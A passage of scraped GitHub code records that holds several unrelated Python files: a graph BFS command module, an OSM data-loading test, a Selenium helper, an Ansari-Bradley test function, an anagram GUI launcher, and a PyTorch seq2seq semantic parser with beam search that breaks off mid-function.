python; coding: utf-8 -*-\n\n\"\"\"Command description.\"\"\"\n\nimport collections\nimport itertools\nimport logging\n\nfrom dsapy import app\n\nfrom sgmt import common\nfrom sgmt import csvutil\nfrom sgmt import nodeutil\n\n\n_logger = logging.getLogger(__name__)\n\n\nclass GraphOpMixin(object):\n @classmethod\n def add_arguments(cls, parser):\n super().add_arguments(parser)\n\n parser.add_argument(\n '--src',\n default='src',\n help='Edge source column name.',\n )\n parser.add_argument(\n '--dst',\n default='dst',\n help='Edge destination column name.',\n )\n\n @common.lazy\n def graph_tool(self):\n return GraphTool(src=self.flags.src, dst=self.flags.dst)\n\n\nclass GraphNodeOpMixin(GraphOpMixin):\n @classmethod\n def add_arguments(cls, parser):\n super().add_arguments(parser)\n\n parser.add_argument(\n '--node',\n default='node',\n help='Node output column name.',\n )\n\n @common.lazy\n def graph_tool(self):\n return GraphTool(src=self.flags.src, dst=self.flags.dst, node=self.flags.node)\n\n def get_out_fieldnames(self):\n return [self.flags.node]\n\n\nclass InvertableArg(object):\n @classmethod\n def add_arguments(cls, parser):\n super().add_arguments(parser)\n\n parser.add_argument(\n '--inverted',\n action='store_true',\n help='Operate on a graph with edges inverted',\n )\n\n\nclass InvertableInputMixin(InvertableArg, GraphOpMixin):\n def preprocess_input(self, row):\n row = super().preprocess_input(row)\n if self.flags.inverted:\n return self.graph_tool().invert(row)\n return row\n\n\nclass InvertableOutputMixin(InvertableArg, GraphOpMixin):\n def postprocess_output(self, row):\n row = super().preprocess_input(row)\n if self.flags.inverted:\n return self.graph_tool().invert(row)\n return row\n\n\nclass InvertableMixin(InvertableInputMixin, InvertableOutputMixin):\n pass\n\n\nclass BfsCmd(InvertableMixin, nodeutil.PatternsMixin, csvutil.Filter, app.Command):\n '''BFS on graph.'''\n name = 'bfs'\n\n def process(self, rows):\n gt = self.graph_tool()\n return gt.bfs(rows, self.nodes_match_func())\n\n\nclass SourcesCmd(InvertableInputMixin, GraphNodeOpMixin, csvutil.Filter, app.Command):\n '''Extract source nodes of the graph.'''\n name = 'srcs'\n\n def process(self, rows):\n gt = self.graph_tool()\n return gt.sources(rows)\n\n\nclass GraphTool(object):\n def __init__(self, src='src', dst='dst', node='node'):\n self.src = src\n self.dst = dst\n self.node = node\n\n def bfs(self, rows, is_src):\n return bfs(rows, is_src, self.src, self.dst)\n\n def invert(self, row):\n row = row.copy()\n row[self.src], row[self.dst] = row[self.dst], row[self.src]\n return row\n\n def sources(self, rows):\n return sources(rows, self.node, self.src, self.dst)\n\n\ndef bfs(rows, is_src, src, dst):\n '''BFS.\n\n - rows: an iterable of dicts. Each row represents a graph edge with\n columns for edge source and edge destination. Edge source and edge\n destination are `node`.\n\n - is_src is a predicate function. is_src(node) is true for initial\n nodes for BFS.\n\n - src: name of the edge source column\n\n - dst: name of the edge destination column\n\n Yields rows.\n '''\n deps = collections.defaultdict(dict)\n for r in rows:\n deps[r[src]][r[dst]] = r\n\n visited = {n for n in deps if is_src(n)}\n queue = collections.deque(visited)\n while queue:\n fsrc = queue.popleft()\n for fdst, row in deps[fsrc].items():\n yield row\n if fdst in visited:\n continue\n visited.add(fdst)\n queue.append(fdst)\n\n\ndef sources(rows, node, src, dst):\n srcs, dsts = set(), set()\n for row in rows:\n srcs.add(row[src])\n if dst != src:\n dsts.add(row[dst])\n for n in sorted(srcs - dsts):\n r = csvutil.Row()\n r[node] = n\n yield r\n","repo_name":"diseaz/sgmt","sub_path":"sgmt/cmd/graph_ops.py","file_name":"graph_ops.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44000511514","text":"import pytest\n\nfrom tradesman.data_retrieval.osm_tags.osm_load_data import load_osm_data\n\n\n@pytest.mark.parametrize(\"tag\", [\"amenity\", \"building\"])\ndef test_load_osm_data(tag: str, nauru_test):\n osm_data = {}\n query = [\n f'[out:json][timeout:180];(node[\"{tag}\"][\"area\"!~\"yes\"]' + \"({});>;);out geom;\",\n f'[out:json][timeout:180];(way[\"{tag}\"][\"area\"!~\"yes\"]' + \"({});>;);out geom;\",\n ]\n\n load_osm_data(tag=tag, osm_data=osm_data, queries=query, project=nauru_test, tile_size=25)\n\n assert osm_data, {tag: []}\n","repo_name":"AequilibraE/tradesman","sub_path":"tests/data_retrieval/test_osm_load_data.py","file_name":"test_osm_load_data.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"5639454395","text":"import time\n\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nfrom base.base_driver import DriverUtil\n\n\nclass Action(object):\n def __init__(self, driver):\n self.driver = driver\n\n def find_element(self, feature, timeout=10, poll=0.5):\n \"\"\"\n 通过对象特征查找对应元素并返回,特征为元组,可填范围(\"id\",\"class\",\"css\",\"link\",\"partial\",\"xpath\",\"tag\",\"name\")\n :param feature: 二元元组,值1范围(\"id\",\"class\",\"css\",\"link\",\"partial\",\"xpath\",\"tag\",\"name\"),值2为值一对应的值\n :param timeout:\n :param poll:\n :return: element\n \"\"\"\n feature_dict = {\n \"id\": By.ID,\n \"class\": By.CLASS_NAME,\n \"css\": By.CSS_SELECTOR,\n \"link\": By.LINK_TEXT,\n \"partial\": By.PARTIAL_LINK_TEXT,\n \"xpath\": By.XPATH,\n \"tag\": By.TAG_NAME,\n \"name\": By.NAME\n }\n\n return WebDriverWait(self.driver, timeout=timeout, poll_frequency=poll).until(\n lambda x: x.find_element(feature_dict[feature[0]], feature[1]))\n\n def find_elements(self, feature, timeout=10, poll=0.5):\n \"\"\"\n 通过对象特征查找对应元素并返回元素列表,特征为元组,可填范围(\"id\",\"class\",\"css\",\"link\",\"partial\",\"xpath\",\"tag\",\"name\")\n :param feature: 二元元组,值1范围(\"id\",\"class\",\"css\",\"link\",\"partial\",\"xpath\",\"tag\",\"name\"),值2为值一对应的值\n :param timeout:\n :param poll:\n :return: elements\n \"\"\"\n FEATURE_DICT = {\n \"id\": By.ID,\n \"class\": By.CLASS_NAME,\n \"css\": By.CSS_SELECTOR,\n \"link\": By.LINK_TEXT,\n \"partial\": By.PARTIAL_LINK_TEXT,\n \"xpath\": By.XPATH,\n \"tag\": By.TAG_NAME,\n \"name\": By.NAME\n }\n\n return WebDriverWait(self.driver, timeout=timeout, poll_frequency=poll).until(\n lambda x: x.find_elements(FEATURE_DICT[feature[0]], feature[1]))\n\n def element_click(self, feature):\n self.find_element(feature).click()\n\n # def scroll_find_element(self, feature, direction=(0, 400)):\n # java_script = \"window.scrollTo({})\".format(direction)\n # page_source_get = \"\"\n # while True:\n # try:\n # return self.find_element(feature)\n # except BaseException:\n # self.driver.execute_script(java_script)\n # if page_source_get == self.driver.page_source:\n # print(\"到底了\")\n # break\n # page_source_get = self.driver.page_source\n\n def scroll_to_down(self, direction=(0, 10000)):\n time.sleep(2)\n java_script = \"window.scrollTo{}\".format(direction)\n self.driver.execute_script(java_script)\n\n def get_element_text(self, feature):\n return self.find_element(feature).text\n\n def window_max(self):\n self.driver.maximaze_window()\n\n def forward(self):\n self.driver.forward()\n\n\nif __name__ == '__main__':\n driver_test = DriverUtil().get_driver()\n driver_test.get(\"http://www.baidu.com\")\n action = Action(driver_test)\n\n element = action.find_element((\"id\", \"kw\"))\n element.send_keys(\"python\")\n\n action.scroll_to_down()\n element2 = action.find_element((\"partial\", \"下一页\"))\n element2.click()\n time.sleep(10)\n DriverUtil().quit_driver()\n","repo_name":"icerainxuiu/auto_test_frame","sub_path":"base/base_action.py","file_name":"base_action.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18606873854","text":"import numpy as np\nfrom scipy.stats import norm, rankdata\n\ndef ansari_bradley(x, y):\n \"\"\"\n Conducts the Ansari-Bradley test to compare the variances of two samples.\n \n Parameters:\n x (array-like): First sample.\n y (array-like): Second sample.\n \n Returns:\n test_statistic (float): The Ansari-Bradley test statistic.\n p_value (float): The p-value of the test.\n \"\"\"\n n = len(x)\n m = len(y)\n \n # Calculate the ranks of the combined data\n ranks = rankdata(np.concatenate((x, y)))\n ranks_x = ranks[:n]\n ranks_y = ranks[n:]\n \n # Calculate the test statistic\n ab = np.sum(np.outer(ranks_x, ranks_y), axis=0)\n test_statistic = ab / (n * m * (n + m + 1) / 12)\n \n # Calculate the p-value using a normal approximation\n var_ab = np.sum(np.outer(ranks_x, ranks_y)**2, axis=0) - (n * m * (n + m + 1)**2 / 4)\n z_score = test_statistic / np.sqrt(var_ab)\n p_value = 2 * norm.sf(abs(z_score))\n \n return test_statistic, p_value\n","repo_name":"Mdslauddin/scistats-main","sub_path":"scistats/hypothesis/_ansaribradley.py","file_name":"_ansaribradley.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6502110671","text":"\"\"\"\nFile: anagram.py\nName: Yu Hsuan Chiu\n----------------------------------\nThis program recursively finds all the anagram(s)\nfor the word input by user and terminates when the\ninput string matches the EXIT constant defined\nat line 19\nIf you correctly implement this program, you should see the\nnumber of anagrams for each word listed below:\n * arm -> 3 anagrams\n * contains -> 5 anagrams\n * stop -> 6 anagrams\n * tesla -> 10 anagrams\n * spear -> 12 anagrams\n\"\"\"\n\nimport tkinter as tk\nimport anagramgui as gui\n\nFILE = 'dictionary.txt'\nCANVAS_WIDTH = 800\nCANVAS_HEIGHT = 450\n\n\ndef main():\n word_d = read_dic()\n\n top = tk.Tk()\n top.wm_title('Anagram Generator')\n top.configure(bg='Azure')\n canvas = gui.make_gui(top, CANVAS_WIDTH, CANVAS_HEIGHT, word_d)\n\n top.mainloop()\n\n\ndef read_dic():\n word_d = {}\n with open(FILE, 'r') as f:\n for line in f:\n word = line.strip()\n word_d[word] = word\n return word_d\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"yuhsuanchiu/standCode-Projects","sub_path":"stanCode_Projects /finding_anagram/anagramgraphic.py","file_name":"anagramgraphic.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22722353281","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport random\nfrom torch.autograd import Variable as Var\nfrom utils import *\nfrom data import *\nfrom lf_evaluator import *\nimport numpy as np\nfrom typing import List\nimport os\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\n\ndef add_models_args(parser):\n \"\"\"\n Command-line arguments to the system related to your model. Feel free to extend here.\n \"\"\"\n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=10, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=1e-3)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n\n\nclass NearestNeighborSemanticParser(object):\n \"\"\"\n Semantic parser that uses Jaccard similarity to find the most similar input example to a particular question and\n returns the associated logical form.\n \"\"\"\n\n def __init__(self, training_data: List[Example]):\n self.training_data = training_data\n\n def decode(self, test_data: List[Example]) -> List[List[Derivation]]:\n \"\"\"\n :param test_data: List[Example] to decode\n :return: A list of k-best lists of Derivations. A Derivation consists of the underlying Example, a probability,\n and a tokenized input string. If you're just doing one-best decoding of example ex and you\n produce output y_tok, you can just return the k-best list [Derivation(ex, 1.0, y_tok)]\n \"\"\"\n test_derivs = []\n for test_ex in test_data:\n test_words = test_ex.x_tok\n best_jaccard = -1\n best_train_ex = None\n # Find the highest word overlap with the train data\n for train_ex in self.training_data:\n # Compute word overlap\n train_words = train_ex.x_tok\n overlap = len(frozenset(train_words) & frozenset(test_words))\n jaccard = overlap / float(len(frozenset(train_words) | frozenset(test_words)))\n if jaccard > best_jaccard:\n best_jaccard = jaccard\n best_train_ex = train_ex\n # N.B. a list!\n test_derivs.append([Derivation(test_ex, 1.0, best_train_ex.y_tok)])\n return test_derivs\n\n\n# The BeamDec here is adapted from the given Beam class in utils.py, some functions are\n# commented out or simplified to better fit the seq2seq decoding scenario\nclass BeamDec(object):\n \"\"\"\n Beam data structure. Maintains a list of scored elements like a Counter, but only keeps the top n\n elements after every insertion operation. Insertion is O(n) (list is maintained in\n sorted order), access is O(1). Still fast enough for practical purposes for small beams.\n \"\"\"\n def __init__(self, size):\n self.size = size\n self.elts = []\n self.scores = []\n\n def __repr__(self):\n return \"Beam(\" + repr(list(self.get_elts_and_scores())) + \")\"\n\n def __str__(self):\n return self.__repr__()\n\n def __len__(self):\n return len(self.elts)\n\n def get_elts_and_scores(self):\n return zip(self.elts, self.scores)\n\n def add(self, elt, score):\n \"\"\"\n Adds the element to the beam with the given score if the beam has room or if the score\n is better than the score of the worst element currently on the beam\n\n :param elt: element to add\n :param score: score corresponding to the element\n \"\"\"\n if len(self.elts) == self.size and score < self.scores[-1]:\n # Do nothing because this element is the worst\n return\n # # If the list contains the item with a lower score, remove it\n # i = 0\n # while i < len(self.elts):\n # if self.elts[i] == elt and score > self.scores[i]:\n # del self.elts[i]\n # del self.scores[i]\n # i += 1\n # If the list is empty, just insert the item\n if len(self.elts) == 0:\n self.elts.insert(0, elt)\n self.scores.insert(0, score)\n # Find the insertion point with binary search\n else:\n lb = 0\n ub = len(self.scores) - 1\n # We're searching for the index of the first element with score less than score\n while lb < ub:\n m = (lb + ub) // 2\n # Check > because the list is sorted in descending order\n if self.scores[m] > score:\n # Put the lower bound ahead of m because all elements before this are greater\n lb = m + 1\n else:\n # m could still be the insertion point\n ub = m\n # lb and ub should be equal and indicate the index of the first element with score less than score.\n # Might be necessary to insert at the end of the list.\n if self.scores[lb] > score:\n self.elts.insert(lb + 1, elt)\n self.scores.insert(lb + 1, score)\n else:\n self.elts.insert(lb, elt)\n self.scores.insert(lb, score)\n # Drop and item from the beam if necessary\n if len(self.scores) > self.size:\n self.elts.pop()\n self.scores.pop()\n\n # def get_elts(self):\n # return self.elts\n #\n # def head(self):\n # return self.elts[0]\n\n\nclass Seq2SeqSemanticParser(nn.Module):\n def __init__(self, input_indexer, output_indexer, emb_dim, hidden_size,\n decoder_len_limit, embedding_dropout=0, bidirect=False):\n # We've include some args for setting up the input embedding and encoder\n # You'll need to add code for output embedding and decoder\n super(Seq2SeqSemanticParser, self).__init__()\n self.input_indexer = input_indexer\n self.output_indexer = output_indexer\n self.decoder_len_limit = decoder_len_limit\n\n self.input_emb = EmbeddingLayer(emb_dim, len(input_indexer), embedding_dropout)\n self.output_emb = EmbeddingLayer(emb_dim, len(output_indexer), embedding_dropout)\n self.encoder = RNNEncoder(emb_dim, hidden_size, bidirect)\n self.decoder = RNNDecoder(emb_dim, hidden_size, len(output_indexer))\n\n def encode_input(self, x_tensor, inp_lens):\n \"\"\"\n Runs the encoder (input embedding layer and encoder as two separate modules) on a tensor of inputs x_tensor with\n inp_lens_tensor lengths.\n YOU DO NOT NEED TO USE THIS FUNCTION. It's merely meant to illustrate the usage of EmbeddingLayer and RNNEncoder\n as they're given to you, as well as show what kinds of inputs/outputs you need from your encoding phase.\n :param x_tensor: [batch size, sent len] tensor of input token indices\n :param inp_lens_tensor: [batch size] vector containing the length of each sentence in the batch\n :param model_input_emb: EmbeddingLayer\n :param model_enc: RNNEncoder\n :return: the encoder outputs (per word), the encoder context mask (matrix of 1s and 0s reflecting which words\n are real and which ones are pad tokens), and the encoder final states (h and c tuple)\n E.g., calling this with x_tensor (0 is pad token):\n [[12, 25, 0, 0],\n [1, 2, 3, 0],\n [2, 0, 0, 0]]\n inp_lens = [2, 3, 1]\n will return outputs with the following shape:\n enc_output_each_word = 3 x 4 x dim, enc_context_mask = [[1, 1, 0, 0], [1, 1, 1, 0], [1, 0, 0, 0]],\n enc_final_states = 3 x dim\n \"\"\"\n input_emb = self.input_emb.forward(x_tensor)\n input_emb = input_emb.unsqueeze(0)\n # print(f\"input_emb is: {input_emb.shape}\")\n # print(f\"pack input is {np.asarray([inp_lens])}\")\n inp_lens = np.asarray([inp_lens])\n (enc_output_each_word, enc_context_mask, enc_final_states) = self.encoder.forward(input_emb, inp_lens)\n enc_final_states_reshaped = (enc_final_states[0].unsqueeze(0), enc_final_states[1].unsqueeze(0))\n return (enc_output_each_word, enc_context_mask, enc_final_states_reshaped)\n\n def encode_output(self, y_tensor):\n output_emb = self.output_emb.forward(y_tensor)\n output_emb = output_emb.unsqueeze(0)\n return output_emb\n\n def forward(self, x_tensor, inp_lens, y_tensor, out_lens, teacher_forcing_rate):\n \"\"\"\n :param x_tensor/y_tensor: either a non-batched input/output [sent len x voc size] or a batched input/output\n [batch size x sent len x voc size]\n :param inp_lens_tensor/out_lens_tensor: either a vecor of input/output length [batch size] or a single integer.\n lengths aren't needed if you don't batchify the training.\n :return: loss of the batch\n \"\"\"\n (enc_output, _, final_states) = self.encode_input(x_tensor, inp_lens)\n hidden, cell = final_states[0], final_states[1]\n # return final_states\n # 1 is ''\n start = [1]\n input = self.encode_output(start)\n # print(f\"first input is: {input.shape}\")\n outputs = torch.zeros(out_lens, len(self.output_indexer))\n\n for i in range(out_lens):\n output, (hidden, cell) = self.decoder.forward(enc_output, input, hidden, cell)\n outputs[i] = output\n # print(outputs[i])\n pred = torch.argmax(output)\n if i < out_lens:\n if random.random() < teacher_forcing_rate: # teacher forcing\n label = [y_tensor[i]]\n else:\n label = [pred]\n input = self.encode_output(label)\n return outputs\n\n def decode(self, test_data: List[Example]) -> List[List[Derivation]]:\n # Create indexed input\n input_max_len = np.max(np.asarray([len(ex.x_indexed) for ex in test_data]))\n all_input_data = make_padded_input_tensor(test_data, self.input_indexer, input_max_len, reverse_input=False)\n\n ans = []\n for i in range(len(test_data)):\n (enc_output, _, final_states) = self.encode_input(all_input_data[i], input_max_len)\n hidden, cell = final_states[0], final_states[1]\n # return final_states\n # 1 is ''\n start = [1]\n input = self.encode_output(start)\n # print(f\"first input is: {input.shape}\")\n outputs = torch.zeros(self.decoder_len_limit, len(self.output_indexer))\n\n p = 1.0\n y_toks = []\n for i in range(self.decoder_len_limit):\n output, (hidden, cell) = self.decoder.forward(enc_output, input, hidden, cell)\n pred = torch.argmax(output)\n\n word = self.output_indexer.get_object(pred.item())\n if word != '' and word != '':\n y_toks.append(word)\n label = [pred]\n input = self.encode_output(label)\n else:\n break\n\n # p = torch.prod(torch.Tensor(torch.max(output, dim=1)))\n # print(f\"^ {torch.argmax(output, dim=1)}\")\n ans.append([Derivation(test_data[i], p, y_toks)])\n return ans\n\n # trying beam search\n def decode_beam(self, test_data: List[Example], size=2) -> List[List[Derivation]]:\n # Create indexed input\n input_max_len = np.max(np.asarray([len(ex.x_indexed) for ex in test_data]))\n all_input_data = make_padded_input_tensor(test_data, self.input_indexer, input_max_len, reverse_input=False)\n\n ans = []\n # size = 2\n for i in range(len(test_data)):\n (enc_output, _, final_states) = self.encode_input(all_input_data[i], input_max_len)\n hidden, cell = final_states[0], final_states[1]\n # return final_states\n # 1 is ''\n start = [1]\n input = self.encode_output(start)\n # enc_output is used for attention\n output, (hidden, cell) = self.decoder.forward(enc_output, input, hidden, cell)\n\n # step 0\n # initialize beams, a list of BeamDec objects which will be appended later\n beams = [BeamDec(size)]\n for idx in range(len(output)):\n beams[0].add(elt=[[idx], hidden, cell], score=output[idx])\n\n # step 1\n beams.append(BeamDec(size))\n for beam_idx in range(size):\n old_idx_list = beams[0].elts[beam_idx][0]\n input = self.encode_output([old_idx_list[-1]])\n hidden = beams[0].elts[beam_idx][1]\n cell = beams[0].elts[beam_idx][2]\n output, (hidden, cell) = self.decoder.forward(enc_output, input, hidden, cell)\n for idx in range(len(output)):\n log_prob = beams[0].scores[beam_idx] + output[idx]\n new_idx_list = old_idx_list + [idx]\n beams[1].add(elt=[new_idx_list, hidden, cell], score=log_prob)\n\n last_stage_idx = self.decoder_len_limit - 1\n # following steps\n for stage in range(2, self.decoder_len_limit):\n beams.append(BeamDec(size))\n num_end = 0\n for beam_idx in range(size):\n old_idx_list = beams[stage-1].elts[beam_idx][0]\n last_idx = old_idx_list[-1]\n last_token = self.output_indexer.get_object(last_idx)\n if last_token != '' and last_token != '':\n input = self.encode_output([last_idx])\n hidden = beams[stage-1].elts[beam_idx][1]\n cell = beams[stage-1].elts[beam_idx][2]\n output, (hidden, cell) = self.decoder.forward(enc_output, input, hidden, cell)\n for idx in range(len(output)):\n log_prob = beams[stage-1].scores[beam_idx] + output[idx]\n new_idx_list = old_idx_list + [idx]\n beams[stage].add(elt=[new_idx_list, hidden, cell], score=log_prob)\n else:\n num_end += 1\n beams[stage].add(elt=beams[stage-1].elts[beam_idx], score=beams[stage-1].scores[beam_idx])\n if num_end == size:\n last_stage_idx = stage\n break\n\n # what we get:\n derivations = []\n for beam_idx in range(size):\n p = np.exp(float(beams[last_stage_idx].scores[beam_idx]))\n y_indices = beams[last_stage_idx].elts[beam_idx][0]\n y_toks = []\n for pos in range(len(y_indices)):\n token = self.output_indexer.get_object(y_indices[pos])\n if token != '' and token != '':\n y_toks.append(token)\n derivations.append(Derivation(test_data[i], p, y_toks))\n\n ans.append(derivations)\n return ans\n\n\nclass EmbeddingLayer(nn.Module):\n \"\"\"\n Embedding layer that has a lookup table of symbols that is [full_dict_size x input_dim]. Includes dropout.\n Works for both non-batched and batched inputs\n \"\"\"\n\n def __init__(self, input_dim: int, full_dict_size: int, embedding_dropout_rate: float):\n \"\"\"\n :param input_dim: dimensionality of the word vectors\n :param full_dict_size: number of words in the vocabulary\n :param embedding_dropout_rate: dropout rate to apply\n \"\"\"\n super(EmbeddingLayer, self).__init__()\n self.size = full_dict_size\n self.dropout = nn.Dropout(embedding_dropout_rate)\n self.word_embedding = nn.Embedding(full_dict_size + 1, input_dim, padding_idx=full_dict_size)\n\n def forward(self, input):\n \"\"\"\n :param input: either a non-batched input [sent len x voc size] or a batched input\n [batch size x sent len x voc size]\n :return: embedded form of the input words (last coordinate replaced by input_dim)\n \"\"\"\n for i in range(len(input)):\n if input[i] == -1: input[i] = self.size\n\n input = torch.IntTensor(input)\n embedded_words = self.word_embedding(input)\n final_embeddings = self.dropout(embedded_words)\n return final_embeddings\n\n\nclass RNNEncoder(nn.Module):\n \"\"\"\n One-layer RNN encoder for batched inputs -- handles multiple sentences at once. To use in non-batched mode, call it\n with a leading dimension of 1 (i.e., use batch size 1)\n \"\"\"\n\n def __init__(self, input_size: int, hidden_size: int, bidirect: bool):\n \"\"\"\n :param input_size: size of word embeddings output by embedding layer\n :param hidden_size: hidden size for the LSTM\n :param bidirect: True if bidirectional, false otherwise\n \"\"\"\n super(RNNEncoder, self).__init__()\n self.bidirect = bidirect\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.reduce_h_W = nn.Linear(hidden_size * 2, hidden_size, bias=True)\n self.reduce_c_W = nn.Linear(hidden_size * 2, hidden_size, bias=True)\n self.rnn = nn.LSTM(input_size, hidden_size, num_layers=1, batch_first=True,\n dropout=0., bidirectional=self.bidirect)\n self.init_weight()\n\n def init_weight(self):\n \"\"\"\n Initializes weight matrices using Xavier initialization\n :return:\n \"\"\"\n nn.init.xavier_uniform_(self.rnn.weight_hh_l0, gain=1)\n nn.init.xavier_uniform_(self.rnn.weight_ih_l0, gain=1)\n if self.bidirect:\n nn.init.xavier_uniform_(self.rnn.weight_hh_l0_reverse, gain=1)\n nn.init.xavier_uniform_(self.rnn.weight_ih_l0_reverse, gain=1)\n nn.init.constant_(self.rnn.bias_hh_l0, 0)\n nn.init.constant_(self.rnn.bias_ih_l0, 0)\n if self.bidirect:\n nn.init.constant_(self.rnn.bias_hh_l0_reverse, 0)\n nn.init.constant_(self.rnn.bias_ih_l0_reverse, 0)\n\n def get_output_size(self):\n return self.hidden_size * 2 if self.bidirect else self.hidden_size\n\n def sent_lens_to_mask(self, lens, max_length):\n return torch.from_numpy(np.asarray(\n [[1 if j < lens.data[i].item() else 0 for j in range(0, max_length)] for i in range(0, lens.shape[0])]))\n\n def forward(self, embedded_words, input_lens):\n \"\"\"\n Runs the forward pass of the LSTM\n :param embedded_words: [batch size x sent len x input dim] tensor\n :param input_lens: [batch size]-length vector containing the length of each input sentence\n :return: output (each word's representation), context_mask (a mask of 0s and 1s\n reflecting where the model's output should be considered), and h_t, a *tuple* containing\n the final states h and c from the encoder for each sentence.\n \"\"\"\n # Takes the embedded sentences, \"packs\" them into an efficient Pytorch-internal representation\n packed_embedding = nn.utils.rnn.pack_padded_sequence(embedded_words, input_lens, batch_first=True,\n enforce_sorted=False)\n # Runs the RNN over each sequence. Returns output at each position as well as the last vectors of the RNN\n # state for each sentence (first/last vectors for bidirectional)\n # print(f\"packed_embedding: {packed_embedding}\")\n output, hn = self.rnn(packed_embedding)\n # Unpacks the Pytorch representation into normal tensors\n output, sent_lens = nn.utils.rnn.pad_packed_sequence(output)\n max_length = input_lens.data[0]\n context_mask = self.sent_lens_to_mask(sent_lens, max_length)\n\n # Grabs the encoded representations out of hn, which is a weird tuple thing.\n # Note: if you want multiple LSTM layers, you'll need to change this to consult the penultimate layer\n # or gather representations from all layers.\n if self.bidirect:\n h, c = hn[0], hn[1]\n # Grab the representations from forward and backward LSTMs\n h_, c_ = torch.cat((h[0], h[1]), dim=1), torch.cat((c[0], c[1]), dim=1)\n # Reduce them by multiplying by a weight matrix so that the hidden size sent to the decoder is the same\n # as the hidden size in the encoder\n new_h = self.reduce_h_W(h_)\n new_c = self.reduce_c_W(c_)\n h_t = (new_h, new_c)\n output = self.reduce_h_W(output[:,0,:])\n else:\n h, c = hn[0][0], hn[1][0]\n h_t = (h, c)\n return (output, context_mask, h_t)\n\n\nclass RNNDecoder(nn.Module):\n def __init__(self, emb_size: int, hidden_size: int, output_size: int):\n super(RNNDecoder, self).__init__()\n self.emb_size = emb_size\n self.hidden_size = hidden_size\n\n self.rnn = nn.LSTM(emb_size, hidden_size)\n self.fc1 = nn.Linear(2*hidden_size, hidden_size)\n # self.relu = nn.ReLU()\n self.fc2 = nn.Linear(hidden_size, output_size)\n # self.fc3 = nn.Linear(output_size, output_size)\n self.logsoftmax = nn.LogSoftmax(dim=0)\n\n # self.W_attn = nn.Linear(hidden_size, hidden_size, bias=False)\n self.init_weight()\n\n def init_weight(self):\n \"\"\"\n Initializes weight matrices using Xavier initialization\n :return:\n \"\"\"\n nn.init.xavier_uniform_(self.rnn.weight_hh_l0, gain=1)\n nn.init.xavier_uniform_(self.rnn.weight_ih_l0, gain=1)\n nn.init.constant_(self.rnn.bias_hh_l0, 0)\n nn.init.constant_(self.rnn.bias_ih_l0, 0)\n\n nn.init.xavier_uniform_(self.fc1.weight)\n nn.init.xavier_uniform_(self.fc2.weight)\n\n def forward(self, attn_vec, input, hidden, cell):\n #print(f\"attn_vec shape: {attn_vec.shape}\") # [19, hidden_size]\n input = input.view(1, 1, -1)\n output, hn = self.rnn(input, (hidden, cell))\n\n # print(f\"attn_vec shape: {attn_vec.shape}\")\n max_len = attn_vec.shape[0]\n # print(f\"output shape: {output.shape}\")\n\n f = torch.empty(max_len)\n for i in range(max_len):\n f[i] = torch.matmul(output[0,0,:], attn_vec[i,0,:])\n\n # print(f\"f shape: {f.shape}\") # 19\n f = nn.Softmax(dim=0)(f)\n # print(f\"f shape: {f.shape}\")\n c = torch.matmul(torch.transpose(attn_vec[:,0,:], 0, 1), f)\n # print(f\"c shape: {c.shape}\")\n output = torch.cat((c, output[0,0,:]), dim=0)\n #print(f\"output shape: {output.shape}\")\n output = self.fc2(self.fc1(output))\n output = self.logsoftmax(output)\n return output, (hn[0], hn[1])\n\n\ndef make_padded_input_tensor(exs: List[Example], input_indexer: Indexer, max_len: int,\n reverse_input=False) -> np.ndarray:\n \"\"\"\n Takes the given Examples and their input indexer and turns them into a numpy array by padding them out to max_len.\n Optionally reverses them.\n :param exs: examples to tensor-ify\n :param input_indexer: Indexer over input symbols; needed to get the index of the pad symbol\n :param max_len: max input len to use (pad/truncate to this length)\n :param reverse_input: True if we should reverse the inputs (useful if doing a unidirectional LSTM encoder)\n :return: A [num example, max_len]-size array of indices of the input tokens\n \"\"\"\n if reverse_input:\n return np.array(\n [[ex.x_indexed[len(ex.x_indexed) - 1 - i] if i < len(ex.x_indexed) else input_indexer.index_of(PAD_SYMBOL)\n for i in range(0, max_len)]\n for ex in exs])\n else:\n return np.array([[ex.x_indexed[i] if i < len(ex.x_indexed) else input_indexer.index_of(PAD_SYMBOL)\n for i in range(0, max_len)]\n for ex in exs])\n\n\ndef make_padded_output_tensor(exs, output_indexer, max_len):\n \"\"\"\n Similar to make_padded_input_tensor, but does it on the outputs without the option to reverse input\n :param exs:\n :param output_indexer:\n :param max_len:\n :return: A [num example, max_len]-size array of indices of the output tokens\n \"\"\"\n return np.array(\n [[ex.y_indexed[i] if i < len(ex.y_indexed) else output_indexer.index_of(PAD_SYMBOL) for i in range(0, max_len)]\n for ex in exs])\n\n\ndef train_model_encdec(train_data: List[Example], dev_data: List[Example], input_indexer, output_indexer,\n args) -> Seq2SeqSemanticParser:\n \"\"\"\n Function to train the encoder-decoder model on the given data.\n :param train_data:\n :param dev_data: Development set in case you wish to evaluate during training\n :param input_indexer: Indexer of input symbols\n :param output_indexer: Indexer of output symbols\n :param args:\n :return:\n \"\"\"\n # Set Random Seed\n random.seed(args.seed)\n np.random.seed(args.seed)\n\n # Create indexed input\n input_max_len = np.max(np.asarray([len(ex.x_indexed) for ex in train_data]))\n all_train_input_data = 